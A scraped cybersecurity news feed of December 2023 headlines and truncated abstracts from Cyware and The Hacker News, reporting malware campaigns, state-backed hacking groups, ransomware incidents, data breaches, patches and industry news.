Saudi Cyber Students Team with Bahrain to Assess AI Security & Risk Full Text

Abstract

Saudi Arabian students specializing in AI and cybersecurity are participating in workshops to enhance their capabilities in identifying and assessing potential risks of large language models (LLMs) across different platforms.

Cyware

December 14, 2023 – Malware

116 Malware Packages Found on PyPI Repository Infecting Windows and Linux Systems Full Text

Abstract

Cybersecurity researchers have identified a set of 116 malicious packages on the Python Package Index (PyPI) repository that are designed to infect Windows and Linux systems with a custom backdoor. "In some cases, the final payload is a variant of the infamous W4SP Stealer , or a simple clipboard monitor to steal cryptocurrency, or both," ESET researchers Marc-Etienne M.Léveillé and Rene Holt said in a report published earlier this week. The packages are estimated to have been downloaded over 10,000 times since May 2023. The threat actors behind the activity have been observed using three techniques to bundle malicious code into Python packages, namely via a test.py script, embedding PowerShell in setup.py file, and incorporating it in obfuscated form in the __init__.py file . Irrespective of the method used, the end goal of the campaign is to compromise the targeted host with malware, primarily a backdoor capable of remote command execution, data exfiltration, an

The Hacker News

December 14, 2023 – Attack

Sony Investigating Potential Ransomware Attack on Insomniac Games Unit Full Text

Abstract

Sony's subsidiary, Insomniac Games, is currently investigating a reported ransomware attack by the Rhysida gang, which has targeted various government institutions and healthcare organizations in the past.

Cyware

December 14, 2023 – Malware

New Pierogi++ Malware by Gaza Cyber Gang Targeting Palestinian Entities Full Text

Abstract

A pro-Hamas threat actor known as Gaza Cyber Gang is targeting Palestinian entities using an updated version of a backdoor dubbed Pierogi. The findings come from SentinelOne, which has given the malware the name Pierogi++ owing to the fact that it's implemented in the C++ programming language unlike its Delphi- and Pascal-based predecessor. "Recent Gaza Cybergang activities show consistent targeting of Palestinian entities, with no observed significant changes in dynamics since the start of the Israel-Hamas war," security researcher Aleksandar Milenkoski said in a report shared with The Hacker News. Gaza Cyber Gang, believed to be active since at least 2012, has a history of striking targets throughout the Middle East, particularly Israel and Palestine, often leveraging spear-phishing as a method of initial access. Some of the notable malware families in its arsenal include BarbWire, DropBook, LastConn, Molerat Loader, Micropsia, NimbleMamba, SharpSt

The Hacker News

December 14, 2023 – Solution

ThreatNG Open-Source Datasets Aim to Improve Cybersecurity Practices Full Text

Abstract

The ThreatNG Governance and Compliance Dataset is an open-source initiative that aims to provide access to critical cybersecurity data, promoting transparency and collaboration.

Cyware

December 14, 2023 – APT

Iranian State-Sponsored OilRig Group Deploys 3 New Malware Downloaders Full Text

Abstract

The Iranian state-sponsored threat actor known as OilRig deployed three different downloader malware throughout 2022 to maintain persistent access to victim organizations located in Israel. The three new downloaders have been named ODAgent, OilCheck, and OilBooster by Slovak cybersecurity company ESET. The attacks also involved the use of an updated version of a known OilRig downloader dubbed SampleCheck5000 (or SC5k). "These lightweight downloaders [...] are notable for using one of several legitimate cloud service APIs for [command-and-control] communication and data exfiltration: the Microsoft Graph OneDrive or Outlook APIs, and the Microsoft Office Exchange Web Services (EWS) API," security researchers Zuzana Hromcová and Adam Burgher said in a report shared with The Hacker News. By using well-known cloud service providers for command-and-control communication, the goal is to blend with authentic network traffic and cover up the group's attack infrastructure

The Hacker News

December 14, 2023 – Attack

District Court in Switzerland ‘Victim of a Cyber Attack’ Full Text

Abstract

This incident follows a similar ransomware attack on the municipal administration of Zollikofen in November, highlighting the growing threat of ransomware attacks targeting Swiss organizations.

Cyware

December 14, 2023 – Education

Reimagining Network Pentesting With Automation Full Text

Abstract

Network penetration testing plays a crucial role in protecting businesses in the ever-evolving world of cybersecurity. Yet, business leaders and IT pros have misconceptions about this process, which impacts their security posture and decision-making. This blog acts as a quick guide on network penetration testing, explaining what it is, debunking common myths and reimagining its role in today's security landscape. What is network penetration testing? Network penetration testing is a proactive approach to cybersecurity in which security experts simulate cyberattacks to identify gaps in an organization's cyberdefense. The key objective of this process is to identify and rectify weaknesses before hackers can exploit them. This process is sometimes called "pentesting" or "ethical hacking." Network pentesting checks for chinks in an organization's armor to help mitigate cyber-risks and protect against data, financial and reputational losses. Differe

The Hacker News

December 14, 2023 – Business

Check Point Software in SEC Settlement Talks in Connection With SolarWinds Probe Full Text

Abstract

Check Point Software Technologies has cooperated with the SEC inquiry into the SolarWinds Orion cyber vulnerability, voluntarily providing documents and information about its limited testing environment access.

Cyware

December 14, 2023 – APT

Russian SVR-Linked APT29 Targets JetBrains TeamCity Servers in Ongoing Attacks Full Text

Abstract

Threat actors affiliated with the Russian Foreign Intelligence Service (SVR) have targeted unpatched JetBrains TeamCity servers in widespread attacks since September 2023. The activity has been tied to a nation-state group known as APT29 , which is also tracked as BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes. It's notable for the supply chain attack targeting SolarWinds and its customers in 2020. "The SVR has, however, been observed using the initial access gleaned by exploiting the TeamCity CVE to escalate its privileges, move laterally, deploy additional backdoors, and take other steps to ensure persistent and long-term access to the compromised network environments," cybersecurity agencies from Poland, the U.K., and the U.S. said . The vulnerability in question is CVE-2023-42793 (CVSS score: 9.8), a critical security flaw that could be weaponized by unauthenticated attackers to achieve remote code execution on affec

The Hacker News

December 14, 2023 – APT

China-Linked APT Volt Typhoon Linked to KV-Botnet Attacks Full Text

Abstract

Volt Typhoon utilizes living-off-the-land techniques and hands-on-keyboard activity to evade detection, routing malicious traffic through compromised SOHO network devices and relying on customized versions of open-source tools for communication.

Cyware

December 14, 2023 – Attack

New Hacker Group ‘GambleForce’ Tageting APAC Firms Using SQL Injection Attacks Full Text

Abstract

A previously unknown hacker outfit called GambleForce has been attributed to a series of SQL injection attacks against companies primarily in the Asia-Pacific (APAC) region since at least September 2023. "GambleForce uses a set of basic yet very effective techniques, including SQL injections and the exploitation of vulnerable website content management systems (CMS) to steal sensitive information, such as user credentials," Singapore-headquartered Group-IB said in a report shared with The Hacker News. The group is estimated to have targeted 24 organizations in the gambling, government, retail, and travel sectors across Australia, Brazil, China, India, Indonesia, the Philippines, South Korea, and Thailand. Six of these attacks were successful. The modus operandi of GambleForce is its exclusive reliance on open-source tools like dirsearch, sqlmap, tinyproxy, and redis-rogue-getshell at different stages of the attacks with the ultimate goal of exfiltrating sensitive inf

The Hacker News

December 14, 2023 – Attack

Red Roof Hotels Claims Cybersecurity Incident Did Not Involve Guest Data Full Text

Abstract

Hotel company Red Roof experienced a ransomware attack in September, but fortunately, no guest data was compromised. The attack was detected when suspicious activity was noticed, leading to the discovery of ransomware.

Cyware

December 13, 2023 – Business

Zero Networks Raises $20 Million Series B to Prevent Attackers From Spreading in Corporate Networks Full Text

Abstract

The funding round was led by U.S. Venture Partners (USVP), and included strategic investor Dmitri Alperovitch, co-founder and former CTO of CrowdStrike, as well as existing investors Venrock, CyberArk, F2 Capital, and Pico Venture Partners.

Cyware

December 13, 2023 – Phishing

BazaCall Phishing Scammers Now Leveraging Google Forms for Deception Full Text

Abstract

The threat actors behind the BazaCall call back phishing attacks have been observed leveraging Google Forms to lend the scheme a veneer of credibility. The method is an "attempt to elevate the perceived authenticity of the initial malicious emails," cybersecurity firm Abnormal Security said in a report published today. BazaCall (aka BazarCall), which was first observed in 2020, refers to a series of phishing attacks in which email messages impersonating legitimate subscription notices are sent to targets, urging them to contact a support desk to dispute or cancel the plan, or risk getting charged anywhere between $50 to $500. By inducing a false sense of urgency, the attacker convinces the target over a phone call to grant them remote access capabilities using remote desktop software and ultimately establish persistence on the host under the guise of offering help to cancel the supposed subscription. Some of the popular services that are impersonated include Netfl

The Hacker News

December 13, 2023 – Criminals

New Underground Market Comes Online Just inTime for the Holidays Full Text

Abstract

The OLVX marketplace operates on the clear web and has gained popularity in recent months. It offers various products and services, including phish kits, remote desktop connections, cPanel credentials, webshells, and stolen data.

Cyware

December 13, 2023 – Solution

Google Using Clang Sanitizers to Protect Android Against Cellular Baseband Vulnerabilities Full Text

Abstract

Google is highlighting the role played by Clang sanitizers in hardening the security of the cellular baseband in the Android operating system and preventing specific kinds of vulnerabilities. This comprises Integer Overflow Sanitizer (IntSan) and BoundsSanitizer (BoundSan), both of which are part of UndefinedBehaviorSanitizer ( UBSan ), a tool designed to catch various kinds of undefined behavior during program execution. "They are architecture agnostic, suitable for bare-metal deployment, and should be enabled in existing C/C++ code bases to mitigate unknown vulnerabilities," Ivan Lozano and Roger Piqueras Jover said in a Tuesday post. The development comes months after the tech giant said it's working with ecosystem partners to increase the security of firmware that interacts with Android, thereby making it difficult for threat actors to achieve remote code execution within the Wi-Fi SoC or the cellular baseband. IntSan and BoundSan are two of the compi

The Hacker News

December 13, 2023 – Breach

Update: Ransomware Group Publishes Stolen Medical Data Full Text

Abstract

The effects of a November ransomware attack against Oceanside, California’s Tri-City Medical Center were contained more than two weeks ago, but now those behind the cyber incident are publishing stolen data on the dark web.

Cyware

December 13, 2023 – Solution

How to Analyze Malware’s Network Traffic in A Sandbox Full Text

Abstract

Malware analysis encompasses a broad range of activities, including examining the malware's network traffic. To be effective at it, it's crucial to understand the common challenges and how to overcome them. Here are three prevalent issues you may encounter and the tools you'll need to address them. Decrypting HTTPS traffic Hypertext Transfer Protocol Secure (HTTPS), the protocol for secure online communication, has become a tool for malware to conceal their malicious activities. By cloaking data exchange between infected devices and command-and-control (C&C) servers, malware can operate undetected, exfiltrating sensitive data, installing additional payloads, and receiving instructions from the operators. Yet, with the right tool, decrypting HTTPS traffic is an easy task. For this purpose, we can use a man-in-the-middle (MITM) proxy. The MITM proxy works as an intermediary between the client and the server, intercepting their communication. The MITM proxy aids analy

The Hacker News

December 13, 2023 – Vulnerabilities

Sophos Backports Fix for CVE-2022-3236 for EOL Firewall Firmware Full Text

Abstract

Sophos has backported the patch for CVE-2022-3236 to end-of-life (EOL) firewall firmware versions due to ongoing attacks exploiting the vulnerability. The code injection vulnerability is being actively exploited by threat actors to target South Asia.

Cyware

December 13, 2023 – Cryptocurrency

Microsoft Warns of Hackers Exploiting OAuth for Cryptocurrency Mining and Phishing Full Text

Abstract

Microsoft has warned that adversaries are using OAuth applications as an automation tool to deploy virtual machines (VMs) for cryptocurrency mining and launch phishing attacks. "Threat actors compromise user accounts to create, modify, and grant high privileges to OAuth applications that they can misuse to hide malicious activity," the Microsoft Threat Intelligence team said in an analysis. "The misuse of OAuth also enables threat actors to maintain access to applications even if they lose access to the initially compromised account." OAuth , short for Open Authorization, is an authorization and delegation framework (as opposed to authentication) that provides applications the ability to securely access information from other websites without handing over passwords. In the attacks detailed by Microsoft, threat actors have been observed launching phishing or password-spraying attacks against poorly secured accounts with permissions to create or modify OAuth

The Hacker News

December 13, 2023 – Government

FCC Reminds Mobile Phone Carriers They Must do More to Prevent SIM Swaps Full Text

Abstract

The FCC has updated its rules to require carriers to better verify customers' identities before making any changes to their accounts. The agency also emphasized the importance of quickly notifying customers of any account changes.

Cyware

December 13, 2023 – Outage

Major Cyber Attack Paralyzes Kyivstar - Ukraine’s Largest Telecom Operator Full Text

Abstract

Ukraine's biggest telecom operator Kyivstar has become the victim of a " powerful hacker attack ," disrupting customer access to mobile and internet services. "The cyberattack on Ukraine's #Kyivstar telecoms operator has impacted all regions of the country with high impact to the capital, metrics show, with knock-on impacts reported to air raid alert network and banking sector as work continues to restore connectivity," NetBlocks said in a series of posts on X (formerly Twitter). Kyivstar, which is owned by Dutch-domiciled multinational telecommunication services company VEON, serves nearly 25 million mobile subscribers and more than 1 million home internet customers. The company said the attack was "a result of" the war with Russia and that it has notified law enforcement and special state services. While Kyivstar is working to restore the services, the internet watchdog noted that the telco is largely offline. That said, Kyivstar has yet t

The Hacker News

December 13, 2023 – Malware

Cluster of Malicious Python Packages in PyPI Discovered Distributing Malware Full Text

Abstract

ESET Research has discovered a cluster of malicious Python packages in PyPI, the official Python package repository. These packages target both Windows and Linux systems and deliver a custom backdoor.

Cyware

December 13, 2023 – Privacy

Congress Finds Pharmacies Give Patient Records to Law Enforcement Without Warrants Full Text

Abstract

A congressional review found that major pharmacy chains do not require a warrant before sharing customers' records with law enforcement, raising concerns about the privacy of Americans' pharmaceutical information.

Cyware

December 13, 2023 – Breach

DonorView Exposes One Million Records for Unknown Time Frame Full Text

Abstract

The exposed information included donor names, addresses, payment methods, and even sensitive data about children associated with the organizations, posing a potential risk for phishing attacks and fraudulent donation requests.

Cyware

December 13, 2023 – Breach

UK Ministry of Defence Fined $440K for Afghan Evacuation Data Breach Full Text

Abstract

The UK's Ministry of Defence has been fined £350,000 ($440,000) by the ICO for failing to protect the personal information of Afghans who worked with the British government and sought relocation after the Taliban took control of Afghanistan.

Cyware

December 13, 2023 – Breach

Dubai’s Largest Taxi App DTC Exposes Data on Over 220,000 People Full Text

Abstract

The leaked data included personal information such as email addresses, phone numbers, and bank details. It also included driver information such as driving license numbers and work permit numbers.

Cyware

December 13, 2023 – Vulnerabilities

Microsoft’s Final 2023 Patch Tuesday: 33 Flaws Fixed, Including 4 Critical Full Text

Abstract

Microsoft released its final set of Patch Tuesday updates for 2023, closing out 33 flaws in its software, making it one of the lightest releases in recent years. Of the 33 shortcomings, four are rated Critical and 29 are rated Important in severity. The fixes are in addition to 18 flaws Microsoft addressed in its Chromium-based Edge browser since the release of Patch Tuesday updates for November 2023 . According to data from the Zero Day Initiative , the software giant has patched more than 900 flaws this year, making it one of the busiest years for Microsoft patches. For comparison, Redmond resolved 917 CVEs in 2022. While none of the vulnerabilities are listed as publicly known or under active attack at the time of release, some of the notable ones are listed below - CVE-2023-35628 (CVSS score: 8.1) - Windows MSHTML Platform Remote Code Execution Vulnerability CVE-2023-35630 (CVSS score: 8.8) - Internet Connection Sharing (ICS) Remote Code Execution Vulnerability CVE

The Hacker News

December 12, 2023 – Vulnerabilities

Gamers Warned of Potential CS2 Exploit That can Reveal IP Addresses Full Text

Abstract

The exploit, which is an XSS vulnerability, allows players to display GIFs using HTML code blocks in-game. This poses a potential security threat to players, as the exploit can access player IP addresses and potentially execute code on their PCs.

Cyware

December 12, 2023 – Policy and Law

Long-Running Clearview AI Class Action Biometric Privacy Case Settles Full Text

Abstract

Clearview AI has reached a settlement in a class-action privacy lawsuit, which alleged that the company violated Illinois' Biometric Information Privacy Act (BIPA) by using online images without consent for its facial recognition technology.

Cyware

December 12, 2023 – Education

Unveiling the Cyber Threats to Healthcare: Beyond the Myths Full Text

Abstract

Let's begin with a thought-provoking question: among a credit card number, a social security number, and an Electronic Health Record (EHR), which commands the highest price on a dark web forum? Surprisingly, it's the EHR, and the difference is stark: according to a study , EHRs can sell for up to $1,000 each, compared to a mere $5 for a credit card number and $1 for a social security number. The reason is simple: while a credit card can be canceled, your personal data can't. This significant value disparity underscores why the healthcare industry remains a prime target for cybercriminals. The sector's rich repository of sensitive data presents a lucrative opportunity for profit-driven attackers. For 12 years running, healthcare has faced the highest average costs per breach compared to any other sector. Exceeding an average of $10 million per breach , it surpasses even the financial sector, which incurs an average cost of around $6 million. The severity of this iss

The Hacker News

December 12, 2023 – Phishing

Fake LinkedIn Profiles Target Saudi Workers for Information Leakage and Financial Fraud Full Text

Abstract

Researchers have discovered nearly a thousand fake profiles created with the intention of reaching out to companies in the Middle East. These profiles, often difficult to distinguish from real ones, have been successful in their campaigns.

Cyware

December 12, 2023 – APT

Russian APT28 Hackers Targeting 13 Nations in Ongoing Cyber Espionage Campaign Full Text

Abstract

The Russian nation-state threat actor known as APT28 has been observed making use of lures related to the ongoing Israel-Hamas war to facilitate the delivery of a custom backdoor called HeadLace. IBM X-Force is tracking the adversary under the name ITG05, which is also known as BlueDelta, Fancy Bear, Forest Blizzard (formerly Strontium), FROZENLAKE, Iron Twilight, Sednit, Sofacy, and TA422. "The newly discovered campaign is directed against targets based in at least 13 nations worldwide and leverages authentic documents created by academic, finance and diplomatic centers," security researchers Golo Mühr, Claire Zaboeva, and Joe Fasulo said . "ITG05's infrastructure ensures only targets from a single specific country can receive the malware, indicating the highly targeted nature of the campaign." Targets of the campaign include Hungary, Türkiye, Australia, Poland, Belgium, Ukraine, Germany, Azerbaijan, Saudi Arabia, Kazakhstan, Italy, Latvia, and Romania

The Hacker News

December 12, 2023 – General

Security Automation Gains Traction, Prompting a “Shift Everywhere” Philosophy Full Text

Abstract

According to Synopsys, the use of automated security technology is on the rise, as organizations increasingly embrace the "shift everywhere" philosophy to improve the effectiveness and reduce the cost of security activities.

Cyware

December 12, 2023 – General

Non-Human Access is the Path of Least Resistance: A 2023 Recap Full Text

Abstract

2023 has seen its fair share of cyber attacks, however there's one attack vector that proves to be more prominent than others - non-human access. With 11 high-profile attacks in 13 months and an ever-growing ungoverned attack surface, non-human identities are the new perimeter, and 2023 is only the beginning. Why non-human access is a cybercriminal's paradise People always look for the easiest way to get what they want, and this goes for cybercrime as well. Threat actors look for the path of least resistance, and it seems that in 2023 this path was non-user access credentials (API keys, tokens, service accounts and secrets). " 50% of the active access tokens connecting Salesforce and third-party apps are unused. In GitHub and GCP the numbers reach 33%." These non-user access credentials are used to connect apps and resources to other cloud services. What makes them a true hacker's dream is that they have no security measures like user credentials do (MFA, SSO or other IAM pol

The Hacker News

December 12, 2023 – Criminals

Cybercriminals Continue Targeting Open Remote Access Products Full Text

Abstract

According to WatchGuard, cybercriminals are still primarily targeting open remote access products and using legitimate remote access tools to hide their malicious activities.

Cyware

December 12, 2023 – Phishing

New MrAnon Stealer Malware Targeting German Users via Booking-Themed Scam Full Text

Abstract

A phishing campaign has been observed delivering an information stealer malware called MrAnon Stealer to unsuspecting victims via seemingly benign booking-themed PDF lures. "This malware is a Python-based information stealer compressed with cx-Freeze to evade detection," Fortinet FortiGuard Labs researcher Cara Lin said . "MrAnon Stealer steals its victims' credentials, system information, browser sessions, and cryptocurrency extensions." There is evidence to suggest that Germany is the primary target of the attack as of November 2023, owing to the number of times the downloader URL hosting the payload has been queried. Masquerading as a company looking to book hotel rooms, the phishing email bears a PDF file that, upon opening, activates the infection by prompting the recipient to download an updated version of Adobe Flash. Doing so results in the execution of .NET executables and PowerShell scripts to ultimately run a pernicious Python script, which i

The Hacker News

December 12, 2023 – Attack

Nearly 130,000 Affected by Ransomware Attack on Cold Storage Company Americold Full Text

Abstract

The cyberattack resulted in the leak of sensitive data, including names, addresses, Social Security numbers, financial account information, and employment-related health insurance and medical information.

Cyware

December 12, 2023 – Vulnerabilities

Apple Releases Security Updates to Patch Critical iOS and macOS Security Flaws Full Text

Abstract

Apple on Monday released security patches for iOS, iPadOS, macOS, tvOS, watchOS, and Safari web browser to address multiple security flaws, in addition to backporting fixes for two recently disclosed zero-days to older devices. This includes updates for 12 security vulnerabilities in iOS and iPadOS spanning AVEVideoEncoder, ExtensionKit, Find My, ImageIO, Kernel, Safari Private Browsing, and WebKit. macOS Sonoma 14.2 , for its part, resolves 39 shortcomings, counting six bugs impacting the ncurses library . Notable among the flaws is CVE-2023-45866 , a critical security issue in Bluetooth that could allow an attacker in a privileged network position to inject keystrokes by spoofing a keyboard. The vulnerability was disclosed by SkySafe security researcher Marc Newlin last week. It has been remediated in iOS 17.2, iPadOS 17.2, and macOS Sonoma 14.2 with improved checks, the iPhone maker said. Also released by Apple is Safari 17.2 , containing fixes for two WebKit flaws – C

The Hacker News

December 12, 2023 – Vulnerabilities

New Critical RCE Vulnerability Discovered in Apache Struts 2 - Patch Now Full Text

Abstract

Apache has released a security advisory warning of a critical security flaw in the Struts 2 open-source web application framework that could result in remote code execution. Tracked as CVE-2023-50164 , the vulnerability is rooted in a flawed "file upload logic" that could enable unauthorized path traversal and could be exploited under the circumstances to upload a malicious file and achieve execution of arbitrary code. Struts is a Java framework that uses the Model-View-Controller ( MVC ) architecture for building enterprise-oriented web applications. Steven Seeley of Source Incite has been credited with discovering and reporting the flaw, which impacts the following versions of the software - Struts 2.3.37 (EOL) Struts 2.5.0 - Struts 2.5.32, and Struts 6.0.0 - Struts 6.3.0 Patches for the bug are available in versions 2.5.33 and 6.3.0.2 or greater. There are no workarounds that remediate the issue. "All developers are strongly advised to perform this upgr

The Hacker News

December 11, 2023 – Breach

Australia: University of Wollongong Confirms Data Breach, Notifies Authorities Full Text

Abstract

The University of Wollongong has experienced a data breach, with potentially both staff and students affected. The breach has been detected and contained, and investigations are underway to determine the scope of the breach.

Cyware

December 11, 2023 – APT

Researchers Unmask Sandman APT’s Hidden Link to China-Based KEYPLUG Backdoor Full Text

Abstract

Tactical and targeting overlaps have been discovered between the enigmatic advanced persistent threat (APT) called Sandman and a China-based threat cluster that's known to use a backdoor known as KEYPLUG. The assessment comes jointly from SentinelOne, PwC, and the Microsoft Threat Intelligence team based on the fact that the adversary's Lua-based malware LuaDream and KEYPLUG have been determined to cohabit in the same victim networks. Microsoft and PwC are tracking the activity under the names Storm-0866 and Red Dev 40, respectively. "Sandman and Storm-0866/Red Dev 40 share infrastructure control and management practices, including hosting provider selections, and domain naming conventions," the companies said in a report shared with The Hacker News. "The implementation of LuaDream and KEYPLUG reveals indicators of shared development practices and overlaps in functionalities and design, suggesting shared functional requirements by their operators."

The Hacker News

December 11, 2023 – Business

Opal Security, Which Helps Companies Manage Access and Identities, Raises $22M Full Text

Abstract

Identity management solution provider Opal Security has managed to raise $22 million in a Series B round to expand its team and develop new AI-powered tools for identity and access risk remediation.

Cyware

December 11, 2023 – Attack

Lazarus Group Using Log4j Exploits to Deploy Remote Access Trojans Full Text

Abstract

The notorious North Korea-linked threat actor known as the Lazarus Group has been attributed to a new global campaign that involves the opportunistic exploitation of security flaws in Log4j to deploy previously undocumented remote access trojans (RATs) on compromised hosts. Cisco Talos is tracking the activity under the name Operation Blacksmith, noting the use of three DLang-based malware families, including a RAT called NineRAT that leverages Telegram for command-and-control (C2), DLRAT, and a downloader dubbed BottomLoader. The cybersecurity firm described the latest tactics of the adversary as a definitive shift and that they overlap with the cluster widely tracked as Andariel (aka Onyx Sleet or Silent Chollima), a sub-group within the Lazarus umbrella. "Andariel is typically tasked with initial access, reconnaissance and establishing long term access for espionage in support of the North Korean government's national interests," Talos researchers Jung soo An, As

The Hacker News

December 11, 2023 – Vulnerabilities

Apache Fixed Critical RCE Flaw CVE-2023-50164 in Struts 2 Full Text

Abstract

The Apache Software Foundation has released security updates to address a critical file upload vulnerability in the Struts 2 framework, which could allow for remote code execution.

Cyware

December 11, 2023 – Education

Playbook: Your First 100 Days as a vCISO - 5 Steps to Success Full Text

Abstract

In an increasingly digital world, no organization is spared from cyber threats. Yet, not every organization has the luxury of hiring a full-time, in-house CISO. This gap in cybersecurity leadership is where you, as a vCISO, come in. You are the person who will establish, develop, and solidify the organization's cybersecurity infrastructure, blending strategic guidance with actionable cybersecurity services. As an organizational leader, you will be required to navigate professional duties, business needs, diverse organizational personas and leadership demands. Your success relies on your ability to build trust and establish yourself as a strategic decision-maker that can protect the organization. As such, your first 100 days in a new organization are key to your success . They will lay the groundwork for your long-term achievements. To aid you in this critical phase, we introduce a comprehensive guide: a five-step, 100-day action plan, "Your First 100 Days as a vCISO - 5

The Hacker News

December 11, 2023 – Malware

GULOADER Adds New Anti-Analysis Tactic to Arsenal Full Text

Abstract

Researchers have identified new techniques employed by the GuLoader malware to enhance its evasion capabilities and make analysis more challenging. The highly evasive shellcode downloader malware was found leveraging Vectored Exception Handler (VEH) capability. Organizations can leverage the late ... Read More

Cyware

December 11, 2023 – Malware

SpyLoan Scandal: 18 Malicious Loan Apps Defraud Millions of Android Users Full Text

Abstract

Cybersecurity researchers have discovered 18 malicious loan apps for Android on the Google Play Store that have been collectively downloaded over 12 million times. "Despite their attractive appearance, these services are in fact designed to defraud users by offering them high-interest-rate loans endorsed with deceitful descriptions, all while collecting their victims' personal and financial information to blackmail them, and in the end gain their funds," ESET said . The Slovak cybersecurity company is tracking these apps under the name SpyLoan , noting they are designed to target potential borrowers located in Southeast Asia, Africa, and Latin America. The list of apps, which have now been taken down by Google, is below - AA Kredit: इंस्टेंट लोन ऐप (com.aa.kredit.android) Amor Cash: Préstamos Sin Buró (com.amorcash.credito.prestamo) Oro Préstamo - Efectivo rápido (com.app.lo.go) Cashwow (com.cashwow.cow.eg) CrediBus Préstamos de crédito (com.dinero.profin.pr

The Hacker News

December 11, 2023 – Government

CISA and ENISA Signed a Working Arrangement to Enhance Cooperation Full Text

Abstract

The collaboration aims to strengthen cybersecurity, safeguard critical infrastructure, and reinforce the resilience of digital products in the face of increasing cyber threats.

Cyware

December 11, 2023 – Education

Webinar — Psychology of Social Engineering: Decoding the Mind of a Cyber Attacker Full Text

Abstract

In the ever-evolving cybersecurity landscape, one method stands out for its chilling effectiveness – social engineering. But why does it work so well? The answer lies in the intricate dance between the attacker's mind and human psychology. Our upcoming webinar, " Think Like a Hacker, Defend Like a Pro ," highlights this alarming trend. We delve deep into social engineering, exploring its roots in human psychology and why it remains a formidable weapon in the cyber attacker's arsenal. What Will You Learn? Understanding Social Engineering : An in-depth look at the evolution and continued effectiveness of social engineering in cyberattacks. Human Psychology in Cybersecurity : Insights into how social engineers twist psychological principles for nefarious purposes. Tactical Awareness : Learn to identify both used and unused tactics by social engineers, and understand the misinformation leveraged in their campaigns. Strategic Defense : Arm yourself with the knowl

The Hacker News

December 11, 2023 – Policy and Law

UK Sanctions Nine Linked to Cyber Trafficking in Southeast Asia Full Text

Abstract

The United Kingdom has imposed sanctions on individuals and entities involved in Southeast Asia's online scamming industry, targeting both human traffickers and companies connected to scam operations.

Cyware

December 11, 2023 – Malware

New PoolParty Process Injection Techniques Outsmart Top EDR Solutions Full Text

Abstract

A new collection of eight process injection techniques, collectively dubbed PoolParty , could be exploited to achieve code execution in Windows systems while evading endpoint detection and response (EDR) systems. SafeBreach researcher Alon Leviev said the methods are "capable of working across all processes without any limitations, making them more flexible than existing process injection techniques." The findings were first presented at the Black Hat Europe 2023 conference last week. Process injection refers to an evasion technique used to run arbitrary code in a target process. A wide range of process injection techniques exists, such as dynamic link library (DLL) injection, portable executable injection, thread execution hijacking, process hollowing, and process doppelgänging. PoolParty is so named because it's rooted in a component called Windows user-mode thread pool, leveraging it to insert any type of work item into a target process on the system. I

The Hacker News

December 9, 2023 – Vulnerabilities

Researchers Automated Jailbreaking of LLMs With Other LLMs Full Text

Abstract

Researchers have developed an automated machine learning technique, called TAP, that can quickly exploit vulnerabilities in large language models (LLMs) and make them produce harmful and toxic responses.

Cyware

December 09, 2023 – Vulnerabilities

SLAM Attack: New Spectre-based Vulnerability Impacts Intel, AMD, and Arm CPUs Full Text

Abstract

Researchers from the Vrije Universiteit Amsterdam have disclosed a new side-channel attack called SLAM that could be exploited to leak sensitive information from kernel memory on current and upcoming CPUs from Intel, AMD, and Arm. The attack is an end-to-end exploit for Spectre based on a new feature in Intel CPUs called Linear Address Masking ( LAM ) as well as its analogous counterparts from AMD (called Upper Address Ignore or UAI ) and Arm (called Top Byte Ignore or TBI ). "SLAM exploits unmasked gadgets to let a userland process leak arbitrary ASCII kernel data," VUSec researchers said , adding it could be leveraged to leak the root password hash within minutes from kernel memory. While LAM is presented as a security feature, the study found that it ironically degrades security and "dramatically" increases the Spectre attack surface , resulting in a transient execution attack, which exploits speculative execution to extract sensitive data via

The Hacker News

December 9, 2023 – Malware

Bypassing Major EDRs Using Pool Party Process Injection Techniques Full Text

Abstract

The technique utilizes Windows thread pools and includes a chain of three primitives for memory allocation, writing malicious code, and executing it, making it more flexible than existing process injection techniques.

Cyware

December 09, 2023 – Malware

Researchers Unveal GuLoader Malware’s Latest Anti-Analysis Techniques Full Text

Abstract

Threat hunters have unmasked the latest tricks adopted by a malware strain called GuLoader in an effort to make analysis more challenging. "While GuLoader's core functionality hasn't changed drastically over the past few years, these constant updates in their obfuscation techniques make analyzing GuLoader a time-consuming and resource-intensive process," Elastic Security Labs researcher Daniel Stepanic said in a report published this week. First spotted in late 2019, GuLoader (aka CloudEyE) is an advanced shellcode-based malware downloader that's used to distribute a wide range of payloads, such as information stealers, while incorporating a bevy of sophisticated anti-analysis techniques to dodge traditional security solutions. A steady stream of open-source reporting into the malware in recent months has revealed the threat actors behind it have continued to improve its ability to bypass existing or new security features alongside other implemented fe

The Hacker News

December 9, 2023 – Attack

Central Virginia Transit System Affected by Cyber Incident Full Text

Abstract

The Greater Richmond Transit Company (GRTC) experienced a cyberattack over the Thanksgiving holiday, resulting in a temporary disruption to their computer network. The Play ransomware gang has claimed responsibility for the attack.

Cyware

December 9, 2023 – Attack

Hackers Hit Erris Water in Stance Over Israel Full Text

Abstract

Cybercriminals targeted a private group water scheme in the Erris area, causing disruption to 180 homeowners and highlighting the vulnerability of critical infrastructure to politically motivated cyber-attacks.

Cyware

December 9, 2023 – Breach

Android Barcode Scanner App Exposes User Passwords Full Text

Abstract

The Android app Barcode to Sheet, with over 100k downloads, has left sensitive user data exposed due to an open instance, including plaintext enterprise data and weakly hashed passwords.

Cyware

December 8, 2023 – Government

FCC Partners With Four States on Privacy and Data Protection Enforcement Full Text

Abstract

By collaborating with state enforcers, the FCC can enhance its investigative efforts, share information, and leverage tools to address consumer harms more effectively in the realm of privacy and cybersecurity.

Cyware

December 08, 2023 – Vulnerabilities

New 5G Modems Flaws Affect iOS Devices and Android Models from Major Brands Full Text

Abstract

A collection of security flaws in the firmware implementation of 5G mobile network modems from major chipset vendors such as MediaTek and Qualcomm impact USB and IoT modems as well as hundreds of smartphone models running Android and iOS. Of the 14 flaws – collectively called 5Ghoul (a combination of "5G" and "Ghoul") – 10 affect 5G modems from the two companies, out of which three have been classified as high-severity vulnerabilities. "5Ghoul vulnerabilities may be exploited to continuously launch attacks to drop the connections, freeze the connection that involve manual reboot or downgrade the 5G connectivity to 4G," the researchers said in a study published today. As many as 714 smartphones from 24 brands are impacted, including those from Vivo, Xiaomi, OPPO, Samsung, Honor, Motorola, realme, OnePlus, Huawei, ZTE, Asus, Sony, Meizu, Nokia, Apple, and Google. The vulnerabilities were disclosed by a team of researchers from the ASSET (Automated

The Hacker News

December 8, 2023 – Breach

Update: Records Reveal New Information About Sweetwater Union High School District Data Breach Full Text

Abstract

